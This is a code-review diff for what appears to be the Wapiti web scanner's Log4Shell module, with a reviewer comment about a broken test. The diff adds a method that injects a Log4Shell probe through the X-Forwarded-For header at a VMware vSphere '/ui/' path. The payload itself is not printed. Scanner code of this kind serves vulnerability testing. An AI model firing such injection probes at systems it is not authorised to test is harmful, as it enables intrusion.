wapitiCore/attack/mod_log4shell.py

```diff
@@ -41,7 +42,34 @@ async def read_headers(self) -> List[str]:
         with open(path_join(self.DATA_DIR, self.HEADERS_FILE), encoding='utf-8') as headers_file:
             return headers_file.read().strip().split("\n")
 
+    async def attack_vsphere_url(self, original_request: Request):
+        header_target = "X-Forwarded-For"
+
+        malicious_request = Request(
+            path=original_request.url,
+            method=original_request.method,
+            get_params=[["SAMLRequest", ""]],
+            referer=original_request.referer,
+            link_depth=original_request.link_depth
+        )
+        payload_unique_id = uuid.uuid4()
+        payload = self._generate_payload(payload_unique_id)
+        malicious_headers = {header_target: payload}
+
+        try:
+            await self.crawler.async_send(malicious_request, malicious_headers, follow_redirects=True)
+        except RequestError:
+            self.network_errors += 1
+            return
+        await self._verify_header_vulnerability(malicious_request, header_target, payload, payload_unique_id)
+
     async def attack(self, request: Request):
+        root_url = await self.persister.get_root_url()
+
+        if request.url == root_url:
+            await self.attack_vsphere_url(Request(root_url + ("" if root_url.endswith("/") else "/") + "ui/"))
```

Comment:
Breaks the test, you should use `persister.get_root_url.return_value = "http://..."` in test_mod_log4shell.py